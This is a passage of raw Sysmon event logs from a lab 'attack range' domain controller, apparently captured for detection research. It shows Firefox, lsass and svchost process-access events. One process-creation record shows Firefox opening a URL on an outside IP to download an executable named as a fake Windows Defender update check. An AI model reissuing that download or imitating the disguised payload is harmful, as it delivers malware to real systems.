Files\Mozilla Firefox\xul.dll+e77459|C:\Program Files\Mozilla Firefox\xul.dll+e86462|C:\Program Files\Mozilla Firefox\xul.dll+ebac4|C:\Program Files\Mozilla Firefox\xul.dll+1a94a5b|C:\Program Files\Mozilla Firefox\xul.dll+1a93e85|C:\Program Files\Mozilla Firefox\xul.dll+1a968e2|C:\Program Files\Mozilla Firefox\xul.dll+17e5104|C:\Program Files\Mozilla Firefox\xul.dll+1ac03d9|C:\Program Files\Mozilla Firefox\xul.dll+9d10af|C:\Program Files\Mozilla Firefox\xul.dll+1f57e|C:\Program Files\Mozilla Firefox\xul.dll+16d888|C:\Program Files\Mozilla Firefox\xul.dll+16c717|C:\Program Files\Mozilla Firefox\xul.dll+46b6cd1|C:\Program Files\Mozilla Firefox\xul.dll+472a2ec|C:\Program Files\Mozilla Firefox\xul.dll+472b10d|C:\Program Files\Mozilla Firefox\xul.dll+20599f2|C:\Program Files\Mozilla Firefox\firefox.exe+1e99e|C:\Program Files\Mozilla Firefox\firefox.exe+2c9f8|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000048315Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:38.037{FE4C2B44-E66B-63C7-9B06-00000000AF02}33045548C:\Program Files\Mozilla Firefox\firefox.exe{FE4C2B44-E66E-63C7-A306-00000000AF02}1712C:\Program Files\Mozilla Firefox\firefox.exe0x101451C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\Mozilla Firefox\xul.dll+9e834a|C:\Program Files\Mozilla Firefox\xul.dll+ebac4|C:\Program Files\Mozilla Firefox\xul.dll+2581e76|C:\Program Files\Mozilla Firefox\xul.dll+1ab508d|C:\Program Files\Mozilla Firefox\xul.dll+12705|C:\Program Files\Mozilla Firefox\xul.dll+9d10af|C:\Program Files\Mozilla Firefox\xul.dll+12237|C:\Program Files\Mozilla Firefox\xul.dll+9cdfc1|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Program Files\Mozilla Firefox\mozglue.dll+1f968|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048314Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:38.037{FE4C2B44-E66B-63C7-9B06-00000000AF02}33045548C:\Program Files\Mozilla Firefox\firefox.exe{FE4C2B44-E66D-63C7-A106-00000000AF02}876C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\Mozilla Firefox\xul.dll+1ab6bf1|C:\Program Files\Mozilla Firefox\xul.dll+1ab4ec7|C:\Program Files\Mozilla Firefox\xul.dll+12705|C:\Program Files\Mozilla Firefox\xul.dll+9d10af|C:\Program Files\Mozilla Firefox\xul.dll+12237|C:\Program Files\Mozilla Firefox\xul.dll+9cdfc1|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Program Files\Mozilla Firefox\mozglue.dll+1f968|C:\Windows\SYSTEM32\ntdll.dll+51791 18141800x800000000000000048313Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-ConnectPipe2023-01-18 12:30:38.036{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304\chrome.3304.5.134706918C:\Program Files\Mozilla Firefox\firefox.exe 23542300x800000000000000048312Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:38.034{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5A05D37672ABE80EB430F4AA8C6EC3F8,SHA256=8F9B2776B737CAF72BFA5F8EE1AC5B3E64E31A4E00FDD4E673880871CBF7B9E8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000048311Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:38.032{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326916C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048310Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:38.032{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326916C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048309Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:38.032{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326916C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048308Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:38.032{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326916C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048307Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:38.031{FE4C2B44-DDF4-63C7-A004-00000000AF02}47004228C:\Windows\system32\csrss.exe{FE4C2B44-E66E-63C7-A306-00000000AF02}1712C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000048306Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:38.031{FE4C2B44-E66B-63C7-9B06-00000000AF02}33045480C:\Program Files\Mozilla Firefox\firefox.exe{FE4C2B44-E66E-63C7-A306-00000000AF02}1712C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+6e193|C:\Windows\System32\ADVAPI32.dll+188af|C:\Program Files\Mozilla Firefox\firefox.exe+ac12|C:\Program Files\Mozilla Firefox\firefox.exe+6673|C:\Program Files\Mozilla Firefox\xul.dll+7a8fbe|C:\Program Files\Mozilla Firefox\xul.dll+9e365b|C:\Program Files\Mozilla Firefox\xul.dll+9e1625|C:\Program Files\Mozilla Firefox\xul.dll+9e934e|C:\Program Files\Mozilla Firefox\xul.dll+82fb43|C:\Program Files\Mozilla Firefox\xul.dll+17e59b8|C:\Program Files\Mozilla Firefox\xul.dll+17d1c3b|C:\Program Files\Mozilla Firefox\xul.dll+9d10af|C:\Program Files\Mozilla Firefox\xul.dll+1f57e|C:\Program Files\Mozilla Firefox\xul.dll+833d37|C:\Program Files\Mozilla Firefox\nss3.dll+7318c|C:\Program Files\Mozilla Firefox\nss3.dll+885b1|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Program Files\Mozilla Firefox\mozglue.dll+1f968|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000048305Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:38.030{FE4C2B44-E66E-63C7-A306-00000000AF02}1712C:\Program Files\Mozilla Firefox\firefox.exe109.0FirefoxFirefoxMozilla Corporationfirefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3304.7.305918502\2142765947" -childID 6 -isForBrowser -prefsHandle 4652 -prefMapHandle 4812 -prefsLen 31532 -prefMapSize 234522 -jsInitHandle 888 -jsInitLen 246772 -a11yResourceId 64 -parentBuildID 20230112150232 -appDir "C:\Program Files\Mozilla Firefox\browser" - {79070632-dc61-440c-ba2f-f4602066b648} 3304 "\\.\pipe\gecko-crash-server-pipe.3304" 4804 19fbb074058 tabC:\Windows\system32\ATTACKRANGE\Administrator{FE4C2B44-DDF6-63C7-BDF1-300000000000}0x30f1bd2LowMD5=66A6B001D806D3117BBA41DD55C08DE0,SHA256=0FC5FD25E5CB032AF0E867B74AD8FCB3A0F5803F3C661E398D5A03448C5CA946,IMPHASH=B9CD654B3D499FE4AD9B5E6D464FD125{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url http://45.139.105.143/d/rsWinDefendUpdateCheck.exe 10341000x800000000000000048304Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:38.031{FE4C2B44-E66B-63C7-9B06-00000000AF02}33046440C:\Program Files\Mozilla Firefox\firefox.exe{FE4C2B44-E66D-63C7-A106-00000000AF02}876C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\Mozilla Firefox\xul.dll+10a7bb|C:\Program Files\Mozilla Firefox\xul.dll+130eca0|C:\Windows\SYSTEM32\ntdll.dll+7f61d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed13|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Program Files\Mozilla Firefox\mozglue.dll+1f968|C:\Windows\SYSTEM32\ntdll.dll+51791 18141800x800000000000000048303Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-ConnectPipe2023-01-18 12:30:38.031{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304\gecko-crash-server-pipe.3304C:\Program Files\Mozilla Firefox\firefox.exe 10341000x800000000000000048302Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:38.030{FE4C2B44-D9F5-63C7-1200-00000000AF02}7565760C:\Windows\System32\svchost.exe{FE4C2B44-E66E-63C7-A306-00000000AF02}1712C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048301Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:38.030{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048300Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:38.029{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048299Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:38.029{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048298Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:38.029{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048297Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:38.029{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048296Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:38.029{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048295Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:38.029{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048294Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:38.028{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048293Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:38.028{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048292Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:38.028{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048291Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:38.028{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048290Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:38.028{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla 